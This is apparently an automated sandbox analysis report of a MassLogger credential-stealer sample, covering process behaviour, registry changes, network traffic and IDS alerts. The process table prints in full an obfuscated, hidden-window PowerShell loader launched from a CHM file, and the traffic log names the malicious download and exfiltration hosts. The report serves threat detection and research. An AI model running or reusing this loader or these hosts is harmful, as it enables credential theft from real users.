| File name: | 6742672223272960.zip |
| Full analysis: | https://app.any.run/tasks/8a70a4c6-6e87-4a5b-addd-bd2d610f59bf |
| Verdict: | Malicious activity |
| Threats: | MassLogger is a credential stealer and keylogger first identified in April 2020. It has been actively used in cyber campaigns to exfiltrate sensitive information from compromised systems. It is designed for easy use by less tech-savvy actors and is prominent for the capability of spreading via USB drives. It targets both individuals and organizations in various industries, mostly in Europe and the USA. |
| Analysis date: | January 15, 2021, 13:26:45 |
| OS: | Windows 10 Professional (build: 16299, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/zip |
| File info: | Zip archive data, at least v2.0 to extract |
| MD5: | BB95D8F86FF7A536022579FB1B424931 |
| SHA1: | A00F3B5BCF5BD026CA0758FBE84638C0F6D436F2 |
| SHA256: | 4BCAF1D4E2EF5E2E42D288EFC8F75B5845F187FE0C362C19C8B342FD06355E9B |
| SSDEEP: | 96:XhDC0OFHd478k61cyuiVHXFqb8mtbkDBckS:xDs4Iri2H1qb8mqBch |
MALICIOUS
Steals credentials from Web Browsers
- MSBuild.exe (PID: 2396)
Actions looks like stealing of personal data
- MSBuild.exe (PID: 2396)
MASSLOGGER was detected
- MSBuild.exe (PID: 2396)
SUSPICIOUS
Checks for external IP
- MSBuild.exe (PID: 2396)
Checks supported languages
- Powershell.exe (PID: 2104)
- MSBuild.exe (PID: 2396)
Reads Environment values
- Powershell.exe (PID: 2104)
Executed via COM
- OpenWith.exe (PID: 2356)
- OpenWith.exe (PID: 2372)
Creates files in the user directory
- hh.exe (PID: 1060)
- Powershell.exe (PID: 2104)
Reads internet explorer settings
- hh.exe (PID: 1060)
Starts Internet Explorer
- OpenWith.exe (PID: 2356)
Executes PowerShell scripts
- hh.exe (PID: 1060)
- MSBuild.exe (PID: 2396)
INFO
Checks supported languages
- OpenWith.exe (PID: 2356)
Reads settings of System Certificates
- Powershell.exe (PID: 2104)
- powershell.exe (PID: 3772)
Modifies the phishing filter of IE
- IEXPLORE.EXE (PID: 2532)
Manual execution by user
- hh.exe (PID: 1060)
Reads the software policy settings
- Powershell.exe (PID: 2104)
- powershell.exe (PID: 3772)
Changes internet zones settings
- IEXPLORE.EXE (PID: 2532)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .zip | | | ZIP compressed archive (100) |
|---|
EXIF
ZIP
| ZipRequiredVersion: | 20 |
|---|---|
| ZipBitFlag: | 0x0009 |
| ZipCompression: | Deflated |
| ZipModifyDate: | 1980:00:00 00:00:00 |
| ZipCRC: | 0x8a6fbf42 |
| ZipCompressedSize: | 4087 |
| ZipUncompressedSize: | 12007 |
| ZipFileName: | aac62b80b790d96882b4b747a8ed592f45b39ceadd9864948bb391f3f41d7f9f |
Total processes
98
Monitored processes
11
Malicious processes
3
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1060 | "C:\WINDOWS\hh.exe" C:\Users\admin\Desktop\a.chm | C:\WINDOWS\hh.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® HTML Help Executable Exit code: 0 Version: 10.0.16299.15 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2104 | "C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe" -WindowStyle Hidden $dhrqQ='33%46%03%16%C7%72%72%02%E6%96%F6%A6%D2%02%37%27%16%86%34%96%96%36%37%16%42%02%D3%76%E6%96%27%47%35%96%96%36%37%16%42%B3%D7%22%F5%42%87%03%22%D5%56%47%97%26%B5%D5%27%16%86%36%B5%B7%02%47%36%56%A6%26%F4%D2%86%36%16%54%27%F6%64%C7%02%92%72%E5%72%82%47%96%C6%07%37%E2%67%D6%42%02%D3%37%27%16%86%34%96%96%36%37%16%42%B3%92%72%76%07%A6%E2%73%14%F2%F6%36%E2%C6%F6%36%47%56%E6%96%37%F2%F2%A3%07%47%47%86%72%C2%46%F6%86%47%56%D4%A3%A3%D5%56%07%97%45%C6%C6%16%34%E2%36%96%37%16%24%C6%16%57%37%96%65%E2%47%66%F6%37%F6%27%36%96%D4%B5%C2%72%76%E6%96%27%47%72%02%B2%02%72%35%46%16%72%02%B2%02%72%F6%C6%E6%72%02%B2%02%72%77%F6%44%72%C2%97%47%47%42%82%56%D6%16%E6%97%24%C6%C6%16%34%A3%A3%D5%E6%F6%96%47%36%16%27%56%47%E6%94%E2%36%96%37%16%24%C6%16%57%37%96%65%E2%47%66%F6%37%F6%27%36%96%D4%B5%02%D3%67%D6%42%B3%92%72%36%96%37%16%24%C6%16%57%37%96%65%E2%47%66%F6%37%F6%27%36%96%D4%72%82%56%D6%16%E4%C6%16%96%47%27%16%05%86%47%96%75%46%16%F6%C4%A3%A3%D5%97%C6%26%D6%56%37%37%14%E2%E6%F6%96%47%36%56%C6%66%56%25%E2%D6%56%47%37%97%35%B5%02%D5%46%96%F6%67%B5%B3%33%46%03%16%C7%72%92%47%E6%56%72%B2%72%96%C6%34%26%72%B2%72%56%75%E2%47%72%B2%72%56%E4%02%47%36%72%B2%72%56%A6%26%F4%72%B2%72%D2%77%56%E4%82%72%D3%97%47%47%42%B3%23%23%07%42%02%D3%02%C6%F6%36%F6%47%F6%27%05%97%47%96%27%57%36%56%35%A3%A3%D5%27%56%76%16%E6%16%D4%47%E6%96%F6%05%56%36%96%67%27%56%35%E2%47%56%E4%E2%D6%56%47%37%97%35%B5%B3%92%23%73%03%33%02%C2%D5%56%07%97%45%C6%F6%36%F6%47%F6%27%05%97%47%96%27%57%36%56%35%E2%47%56%E4%E2%D6%56%47%37%97%35%B5%82%47%36%56%A6%26%F4%F6%45%A3%A3%D5%D6%57%E6%54%B5%02%D3%02%23%23%07%42%B3%92%76%E6%96%07%42%82%02%C6%96%47%E6%57%02%D7%47%56%96%57%15%D2%02%13%02%47%E6%57%F6%36%D2%02%D6%F6%36%E2%56%C6%76%F6%F6%76%02%07%D6%F6%36%D2%02%E6%F6%96%47%36%56%E6%E6%F6%36%D2%47%37%56%47%02%D3%02%76%E6%96%07%42%B7%02%F6%46%B3%83%43%46%03%36%42%02%33%46%03%16%02%C6%16%37%B3%92%72%94%72%C2%72%04%04%72%82%56%36%16%C6%07%56%27%E2%72%85%54%04%04%72%D3%83%43%46%03%36%42';$text =$dhrqQ.ToCharArray();[Array]::Reverse($text);$tu=-join $text;$jm=$tu.Split('%') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''| & (-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])})) | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | hh.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.16299.15 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2356 | C:\WINDOWS\system32\OpenWith.exe -Embedding | C:\WINDOWS\system32\OpenWith.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Pick an app Exit code: 0 Version: 10.0.16299.15 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2372 | C:\WINDOWS\system32\OpenWith.exe -Embedding | C:\WINDOWS\system32\OpenWith.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Pick an app Exit code: 0 Version: 10.0.16299.15 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2396 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: MSBuild.exe Exit code: 0 Version: 4.7.2556.0 built by: NET471REL1 Modules
| |||||||||||||||
| 2532 | "C:\Program Files\Internet Explorer\IEXPLORE.EXE" C:\Users\admin\AppData\Local\Temp\Rar$DIb3700.8987\aac62b80b790d96882b4b747a8ed592f45b39ceadd9864948bb391f3f41d7f9f | C:\Program Files\Internet Explorer\IEXPLORE.EXE | OpenWith.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Exit code: 1 Version: 11.00.16299.15 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3424 | "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2532 CREDAT:17410 /prefetch:2 | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | IEXPLORE.EXE | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Exit code: 0 Version: 11.00.16299.15 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3628 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\WINDOWS\system32\conhost.exe | Powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.16299.15 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3700 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\6742672223272960.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe | |||||||||||
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.60.0 Modules
| |||||||||||||||
| 3772 | "powershell" Start-Sleep -Seconds 2; Remove-Item -path 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe' | C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | — | MSBuild.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 10.0.16299.15 (WinBuild.160101.0800) Modules
| |||||||||||||||
Total events
5 312
Read events
5 076
Write events
235
Delete events
1
Modification events
| (PID) Process: | (3700) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
| Operation: | write | Name: | ShellExtBMP |
Value: | |||
| (PID) Process: | (3700) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
| Operation: | write | Name: | ShellExtIcon |
Value: | |||
| (PID) Process: | (3700) WinRAR.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\19e\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
| (PID) Process: | (3700) WinRAR.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\19e\52C64B7E |
| Operation: | write | Name: | @C:\WINDOWS\system32\windows.storage.dll,-9216 |
Value: This PC | |||
| (PID) Process: | (3700) WinRAR.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\19e\52C64B7E |
| Operation: | write | Name: | @windows.storage.dll,-21825 |
Value: 3D Objects | |||
| (PID) Process: | (3700) WinRAR.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\19e\52C64B7E |
| Operation: | write | Name: | @C:\WINDOWS\system32\windows.storage.dll,-50691 |
Value: Libraries | |||
| (PID) Process: | (3700) WinRAR.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\19e\52C64B7E |
| Operation: | write | Name: | @C:\WINDOWS\system32\NetworkExplorer.dll,-1 |
Value: Network | |||
| (PID) Process: | (3700) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 0 |
Value: C:\Users\admin\AppData\Local\Temp\6742672223272960.zip | |||
| (PID) Process: | (3700) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | name |
Value: 120 | |||
| (PID) Process: | (3700) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | size |
Value: 80 | |||
Executable files
0
Suspicious files
5
Text files
7
Unknown types
3
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2532 | IEXPLORE.EXE | C:\Users\admin\AppData\Local\Temp\~DFDF11F06AFEAAC757.TMP | — | |
MD5:— | SHA256:— | |||
| 2532 | IEXPLORE.EXE | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\VersionManager\verF492.tmp | — | |
MD5:— | SHA256:— | |||
| 2532 | IEXPLORE.EXE | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\UrlBlock\URLF220.tmp | — | |
MD5:— | SHA256:— | |||
| 2532 | IEXPLORE.EXE | C:\Users\admin\AppData\Local\Temp\~DF8607D1B717E29B37.TMP | — | |
MD5:— | SHA256:— | |||
| 2532 | IEXPLORE.EXE | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{77E50C01-5735-11EB-B470-18F7786F96EE}.dat | — | |
MD5:— | SHA256:— | |||
| 1060 | hh.exe | C:\Users\admin\AppData\Local\Temp\IMT8911.tmp | — | |
MD5:— | SHA256:— | |||
| 2104 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GAKDH95XX0915WQSOU9S.temp | — | |
MD5:— | SHA256:— | |||
| 2104 | Powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_irpjjuhg.tfc.ps1 | — | |
MD5:— | SHA256:— | |||
| 2104 | Powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2dk0dcpz.ahg.psm1 | — | |
MD5:— | SHA256:— | |||
| 2532 | IEXPLORE.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\WLJYL64M\l1[1].dat | binary | |
MD5:— | SHA256:— | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
12
DNS requests
11
Threats
5
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
2104 | Powershell.exe | GET | 200 | 144.217.69.137:80 | http://sinetcol.co/A7.jpg | CA | text | 2.28 Mb | suspicious |
2396 | MSBuild.exe | GET | 200 | 54.221.253.252:80 | http://api.ipify.org/ | US | text | 12 b | shared |
1404 | svchost.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | US | der | 471 b | whitelisted |
1404 | svchost.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQQX6Z6gAidtSefNc6DC0OInqPHDQQUD4BhHIIxYdUvKOeNRji0LOHG2eICEAxFaqaUoD8tSS4dD4X15RQ%3D | US | der | 471 b | whitelisted |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
2532 | IEXPLORE.EXE | 152.199.19.161:443 | iecvlist.microsoft.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
— | — | 23.97.153.169:443 | c.urs.microsoft.com | Microsoft Corporation | NL | suspicious |
2532 | IEXPLORE.EXE | 23.97.153.169:443 | c.urs.microsoft.com | Microsoft Corporation | NL | suspicious |
3424 | IEXPLORE.EXE | 152.199.19.161:443 | iecvlist.microsoft.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
2104 | Powershell.exe | 144.217.69.137:80 | sinetcol.co | OVH SAS | CA | unknown |
2396 | MSBuild.exe | 54.221.253.252:80 | api.ipify.org | Amazon.com, Inc. | US | suspicious |
2396 | MSBuild.exe | 144.91.112.76:54556 | med-star.gr | Mills College | US | malicious |
2396 | MSBuild.exe | 144.91.112.76:21 | med-star.gr | Mills College | US | malicious |
1404 | svchost.exe | 93.184.220.29:80 | ocsp.digicert.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
1404 | svchost.exe | 40.126.31.8:443 | login.live.com | Microsoft Corporation | US | suspicious |
DNS requests
Domain | IP | Reputation |
|---|---|---|
iecvlist.microsoft.com |
| whitelisted |
c.urs.microsoft.com |
| whitelisted |
google.com |
| malicious |
sinetcol.co |
| suspicious |
self.events.data.microsoft.com |
| whitelisted |
api.ipify.org |
| shared |
med-star.gr |
| malicious |
config.edge.skype.com |
| malicious |
login.live.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
2396 | MSBuild.exe | Misc activity | SUSPICIOUS [PTsecurity] External IP Lookup (possible MassLogger) |
2396 | MSBuild.exe | Potential Corporate Privacy Violation | ET POLICY External IP Lookup api.ipify.org |
2396 | MSBuild.exe | Generic Protocol Command Decode | SURICATA Applayer Detect protocol only one direction |
2 ETPRO signatures available at the full report
Process | Message |
|---|---|
conhost.exe | InitSideBySide failed create an activation context. Error: 1814 |